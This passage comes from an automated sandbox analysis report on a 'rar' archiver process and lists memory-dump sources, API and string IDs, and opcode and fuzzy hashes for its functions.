                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: swprintf
                                                                                                                                                                                                                                • String ID: ;%u$x%u$xc%u
                                                                                                                                                                                                                                • API String ID: 233258989-2277559157
                                                                                                                                                                                                                                • Opcode ID: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                                                                                                                                                                                                • Instruction ID: 25aee420c0ed4ecfeea69fc5e424db4273d35deef5045156abdf538f9b0adc20
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B102DF22A0C68285EB28DE2A95453FE6391AF45780F0440B5DAAEC77C2FE7DF55E8301
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileMoveNamePath$CompareLongShortStringswprintf
                                                                                                                                                                                                                                • String ID: rtmp%d
                                                                                                                                                                                                                                • API String ID: 2308737092-3303766350
                                                                                                                                                                                                                                • Opcode ID: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                                                                                                                                                                                                • Instruction ID: 08385590d8f4600612170f89fca6ba8a382b7ebb9c87da1da2fc7cab89088251
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13516F22A18A8645EB71AF21D8411FE6351BF45BC4F551071ED2ECBAEAFE3CD60AC700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseCreateEventHandle$ErrorLast
                                                                                                                                                                                                                                • String ID: rar -ioff
                                                                                                                                                                                                                                • API String ID: 4151682896-4089728129
                                                                                                                                                                                                                                • Opcode ID: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                                                                                                                                                                                                • Instruction ID: ea5771c1a44597ce9294de6614cdb5132e733d858e5634d488403f9c70c7ea1c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F01D128E5DA0BC2FB18DB70EA542722355AF49741F4404B0E82EC23E0EF3EE05F8A40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                • String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
                                                                                                                                                                                                                                • API String ID: 667068680-1824683568
                                                                                                                                                                                                                                • Opcode ID: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
                                                                                                                                                                                                                                • Instruction ID: 549d12ca9e303d334d4afeb6ee7c84f05877bfc42421023efc2880d95ea12854
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6F01925A49B4692EF049B15FA540762360AF4EBC0B4860B0ED2E877A8FF2DE55EC700
APIs
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: +$-
• API String ID: 3215553584-2137968064
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: Backup$Read$Seek$wcschr
• String ID:
• API String ID: 2092471728-0
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: Time$File$System$Local$SpecificVersion
• String ID:
• API String ID: 2092733347-0
APIs
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: Time$File$System$Local$SpecificVersion
• String ID:
• API String ID: 2092733347-0
APIs
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID:
• String ID: exe$rar$rebuilt.$sfx
• API String ID: 0-13699710
                                                                                                                                                                                                                                • Opcode ID: 6e68e50000319b4eebb2839910dcdd3d0876ffe75523bb5545768418df304233
                                                                                                                                                                                                                                • Instruction ID: 20ef29a77e247cded6773a9a49647bd9b5eb0f9134f634604f8bdbef2d1f59cb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e68e50000319b4eebb2839910dcdd3d0876ffe75523bb5545768418df304233
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A81A432A1868259EB31DB29D5112F92392FF86384F4041B5D96D8B6CAFE2DE60FC744
APIs
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwindabort
• String ID: csm$f
• API String ID: 3913153233-629598281
• Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
• Instruction ID: 8a3b68047349bbac2fc7137e747a219e6920596bc585bce732736b1746be9e5a
• Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
• Instruction Fuzzy Hash: 0461A032A0964286EF24DB11E544A7A3791FB54B98F1485B0DE2A877CCFF3CEC4A8740
APIs
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: Security$File$DescriptorLength
• String ID: $ACL
• API String ID: 2361174398-1852320022
• Opcode ID: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
• Instruction ID: c34f75d4c9e1b6151a449c413ade45c4d6a01b9e1c4ec2f4d9961236cde24a77
• Opcode Fuzzy Hash: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
• Instruction Fuzzy Hash: E4318271A19B8192E720DB11E4513EA63A4FB88784F804071EA9D836DAFF3DE61EC700
APIs
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: AddressCompareHandleModuleOrdinalProcStringVersion
• String ID: CompareStringOrdinal$kernel32.dll
• API String ID: 2522007465-2120454788
• Opcode ID: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
• Instruction ID: 166e381b04dec4fa15cc15dd2a37ddccbdcb71f85aa6bc571aa2e9d314b8f692
• Opcode Fuzzy Hash: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
• Instruction Fuzzy Hash: F6217C21B0C64281E7519F16A94527962E1BF56BC0F5441B5EE7DC3AD8FF2CE65F8300
APIs
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
Similarity
• API ID: Time$File$swprintf$LocalSystem
• String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
• API String ID: 1364621626-1794493780
• Opcode ID: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
• Instruction ID: 5c6f4f16b51ef08bfa2665717822e304f6fa4cd944cf8328015186120d4a8693
• Opcode Fuzzy Hash: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
• Instruction Fuzzy Hash: 3F21E476A186418AE760CF69E580A9D77F0F748794F144062EE68D3B88EF39E9468F10
APIs
Strings
Memory Dump Source
• Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
• Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmp
• Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmp
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                • Opcode ID: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                                                                                                                                                                                                • Instruction ID: 2fbbf4ee03afaa47b76f694e6444c8b4631a2dc420ec98597e076564bd9fe204
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34F04421A1968281EF498B11F5542792360EF8C780F441079E96FC66D8EE3DD45E8700
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                                                                                                                                                                                                • Instruction ID: 72508f3df279a8b7954af307181bf2c234edc6fddc7142b7863a22033494e041
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32A1C162A0C7C296EB618F6094403B967A1AF44BA4F4846B5DA7D877C5FF3DE44A8B00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                • Opcode ID: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                                                                                                                                                                                                • Instruction ID: 6a97b85c0a853eac2be056d4848eab349eadd13d1cbe351276db03d42d8274df
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0081DBB2E5C68285F7229B6588806BD67B0BB44B88F4441B5DE2E937D5EF3CE44BC710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
